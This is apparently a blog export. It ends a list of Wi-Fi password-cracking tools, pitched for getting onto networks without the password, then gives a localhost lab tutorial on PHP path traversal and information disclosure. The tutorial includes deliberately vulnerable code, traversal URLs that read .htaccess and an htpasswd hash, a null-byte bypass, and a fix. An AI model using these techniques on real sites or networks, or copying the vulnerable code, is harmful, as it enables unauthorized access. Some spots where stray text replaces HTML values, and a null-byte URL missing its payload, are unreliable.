<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
18. CloudCracker</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
CloudCracker is an online password cracking tool to crack WPA keys of Wireless network. This tool can also be used to crack various other kind of password hashes. You only need to upload the handshake file and enter the network name to start the attack. With 3000 million words long dictionary, this tool is most likely to crack the password. This tool is also used for MD5, SHA and few other cracking. It is also an effective tool and worth to mention if we talk about wireless cracking tools.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
See CloudCracker: <a href="https://www.cloudcracker.com/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">https://www.cloudcracker.com/</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
19. CommonView for Wi-Fi</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
CommonView for Wi-Fi is also a popular wireless network monitor and packer analyzer tool. It comes with easy to understand and use GUI to work with. This tool is basically for Wi-Fi network admins and security professionals who want to monitor and troubleshoot network related problems. It works fine with Wi-Fi 802.11 a/b/g/n/ac networks. It captures every single packet and lets you see useful information of the network. You can also get useful information like protocol distribution, access points, signal strength and more. This tool offers key information about a network and has a good value for network admins.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download CommonView: <a href="http://www.tamos.com/products/commwifi/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://www.tamos.com/products/commwifi/</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
20. Pyrit</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Pyrit is also a very good tool which lets you perform attack on IEEE 802.11 WPA/WPA2-PSK authentication. This tool is available for free and is hosted on Google Code. SO, it could be disappearing in coming months. It works on range of platforms including FreeBSD, MacOS X and Linux.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
It performs brute-force attack to crack the WPA/WPA-2 passwords. It is very effective and I recommend you to try it once. Due to its effectiveness, it was necessary to mention this tool in this list.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Pyrit:<a href="https://code.google.com/p/pyrit/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><br style="box-sizing: border-box;" /></a><a href="https://code.google.com/p/pyrit/" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: #1155cc; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">https://code.google.com/p/pyrit/</span></a></div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
Final words</h1>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
In this post, I added twenty working wireless cracking tools available for free or in open source licenses. You can try these tools to get access to a wireless network without knowing its password. Most of the tools are capable of cracking wireless network passwords but password cracking time may vary depending on the password’s complexity and length. Few tools cannot be directly used in cracking wireless passwords but packet analysis helps in guessing password.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
I also recommend the use of these tools just for learning purpose. We do not encourage illegal activities and do not support these kind of people. Hacking wireless network to get unauthorized access is a cyber-crime. So, do not put yourself into a risk.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
If you are into network security profession, you must know about these tools.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
I tried my best to provide most of the available popular wireless hacking tools. If you have any suggestion, you can comment below to suggest us.</div>
</div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0tag:blogger.com,1999:blog-185877282583432766.post-48659979318687049272016-01-07T14:34:00.000+05:302016-01-07T14:34:36.260+05:30Website hacking Part-II : Path Traversal, usage of Delimiters, and Information Disclosure attack<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://techworm.vijayprabhu.netdna-cdn.com/wp-content/uploads/2014/07/Untitled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://techworm.vijayprabhu.netdna-cdn.com/wp-content/uploads/2014/07/Untitled.png" height="320" width="640" /></a></div>
<span style="background-color: white; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; line-height: 25.9px;">To view Part I of this article, please visit: </span><span style="color: #474747; font-family: Montserrat, sans-serif;"><span style="font-size: 14px; line-height: 25.9px;"><a href="http://opentechnation.blogspot.in/2016/01/website-hacking-part-i-using-hydra.html%C2%A0" target="_blank">http://opentechnation.blogspot.in/2016/01/website-hacking-part-i-using-hydra.html </a></span></span><br />
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
In this Part, we are going to briefly introduce Path Traversal, usage of Delimiters, and Information Disclosure attack.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
We are going to present simple solutions to simplified problems involving the attacks.</div>
<h1 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
Content</h1>
<h2 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.8em; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
Exercise 8: Path Traversal</h2>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; margin-left: 36pt; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/082814_1337_WebsiteHack1.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; color: #4f81bd; font-family: inherit; font-size: 9pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure : A simple webpage in which you choose an article and view it</span></span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The website (index.php) in the PathTraversal folder contains a simple form which submits to the same page through the GET request method. Once a choice of article has been made and “View article” has been clicked, the following PHP code executes:</div>
<pre class="brush: php; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title=""><?php
//If the article GET parameter is set
if (isset($_GET["article"])) {
// Create a div block and fill it with the contents from the file in the GET value.
echo "<div id='article'>" . file_get_contents($_GET["article"]) . "</div>";
}
?>
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The result is the following URL: http://localhost/2/PathTraversal/?article=1.htm</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
It loads the relevant article file placed in the GET method. The parameter article is formed via:</div>
<pre class="brush: xml; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title=""><select name="article" required=""></select></pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
And the values are also directly given through the HTML code (the value attribute):</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Domain Slamming</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Now, legitimate users will use the interface provided in the website to browse it, but with the code as it is we can easily open myriad files they do not want you to open by directly tampering with the URL parameters. Many websites have config directories where they store important data – let’s see if you can do it.</div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
Tasks</h3>
<ol style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin: 0px 1.5em 1.5em 54pt; padding: 0px; vertical-align: baseline;">
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Go back one directory and open openme.txt by changing the URL parameters.</li>
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">
We assume that we cannot open the folder config from our computer but only from the local server. Assume you do not know what files there are in the directory. First, you should check whether the directory exists.</div>
<div style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/082814_1337_WebsiteHack2.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
</li>
</ol>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The directory exists and now we know that there is HTTPAuth in place. Your task is to somehow find out the username and the hashed password for the folder without using any brute-force or dictionary attacks on the username and password.</div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
Spoiler (Task 2)</h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
If we know that there is a HTTPAuth security mechanism in place, then we can automatically deduce there is an .htaccess file. Therefore, we can open the .htaccess file that we would not be able to open normally via the path traversal vulnerability of the article viewer page.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/082814_1337_WebsiteHack3.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; color: #4f81bd; font-family: inherit; font-size: 9pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure: Viewing the .htaccess file from the article viewer page</span></span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
We type <a href="http://localhost/2/PathTraversal/?article=config/.htaccess" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: blue; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://localhost/2/PathTraversal/?article=config/.htaccess</span></a> and now we know the path and the file in which accounts and passwords are stored as well as the user that is required to view the folder.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
We type the path to the userlist.htpasswd file and get all usernames and passwords:</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; color: #32281e; font-family: inherit; font-size: 14pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">tomburrows:$apr1$ZF.78h2N$zhAaP2AY6VwxuELizJAwg.</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Now, the username is known and we have incredibly reduced our cracking time. HTTPAuth is using UNIX’s “CRYPT” function to encrypt the passwords which is a “one way” encryption method.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Using path traversal, we can also go back several directories and browse to the <span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;"><em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">php.ini</em></span> and other important configuration files as well.</div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
A sample solution to our path traversal vulnerability</h3>
<pre class="brush: php; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title=""><?php
//If the article GET parameter is set
if (isset($_GET["article"])) {
//Remove any “/” and “.” characters from the GET parameter’s value as this can be used for path traversal
$article = str_replace(array("/", "."), "", $_GET["article"]);
// If the file does not exist, print a custom error.
if (!file_exists($article . ".htm")) {
echo "<h1>The article does not exist!</h1>";
}
else {
//If and only if the file exists – echo out its contents
// Create a div block and fill it with the contents from the file in the GET value.
//Add a mandatory file extension of .htm to the file
echo "<div id='article'>" . file_get_contents($article . ".htm") . "</div>";
}
}
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The change in the HTML code is that we no longer use the full file name value in the options tags, we just use the name of the file (without its extension so only .htm files would be allowed)</div>
<pre class="brush: xml; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title=""> Keyloggers: How They Work and More
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Firstly, checking if the file exists and echoing it out only if it exists prevents another attack – that of information disclosure.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/082814_1337_WebsiteHack4.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
There is a PHP warning thrown out if we type a non-existent file deliberately. Of course, another way to resolve such information disclosure issues is by turning off the display_errors In the php.ini file (this is most desirable if the site is live anyway).</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
With the above mentioned code we get a clean and neat error that the article does not exist, along with prevention of any path traversal attempts.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/082814_1337_WebsiteHack5.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; color: #4f81bd; font-family: inherit; font-size: 9pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure: We now receive an error when we try to go back one directory and open the openme.txt file</span></span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Note: in old editions of PHP (older than 5.5.3) you could use the marker to end the string abruptly and pass your own file extension in place of the “.htm” one in our solution code.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
if (!file_exists($article . “.htm”)) could be exploited in older versions of PHP by typing:</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<a href="http://localhost/2/PathTraversal/?article=accounts.txt%20" style="border: 0px; box-sizing: border-box; color: #297aa0; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; color: blue; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">http://localhost/2/PathTraversal/?article=accounts.txt </span></a></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Which is equivalent to:</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
“accounts.txt\0.htm” forcing the server to ignore the .htm part of the string.</div>
<h2 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.8em; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
Exercise 9: Information disclosure</h2>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/082814_1337_WebsiteHack6.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; color: #4f81bd; font-family: inherit; font-size: 9pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure: Comment page</span></span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
For this exercise, I have created a working but problematic comments page which looks similar to a chat. You have to write a comment, and then you view all the comments up to now. The comments are stored in a .txt file rather than in a database and there is one PHP file that creates new comments and one that displays them on the screen.</div>
<pre class="brush: php; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">//Index.php server-side code
<?php
$path = "comments/";
?>
<?php
if ($_SERVER["REQUEST_METHOD"] === "POST") {
include("add_comment.php");
}
//Add_comment.php
<?php
//Open file and create an array with all comment information as indices
$comments = file_get_contents($path . "comments.txt");
$newcomment = [];
$newcomment[] = $_POST["name"];
$newcomment[] = $_POST["topic"];
$newcomment[] = $_POST["message"];
// Convert to string and add a delimiter to store in file
$newcomment = implode(":", $newcomment);
// Write the string to the file
$comments_w = fopen($path . "comments.txt", 'w');
fwrite($comments_w, $comments . "\n" . $newcomment . ":" );
// Show all comments
include($path . "view_comments.php");
?>
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/082814_1337_WebsiteHack7.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; color: #4f81bd; font-family: inherit; font-size: 9pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure: How the comments file looks</span></span></div>
<pre class="brush: php; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">// View_comments.php
<?php
//Convert to array and echo all out in a certain format within the comments div
$comments = explode(":", file_get_contents($path . "comments.txt"));
echo "<div id='comments'>";
for ($i = 0; $i < count($comments) - 1; $i += 3) {
echo "<p>User: " . $comments[$i] . "<br> posted about: ".
$comments[$i + 1] . "<br> and he wrote: " . $comments[$i + 2];
echo " </p>";
}
echo "</div>";
?>
</pre>
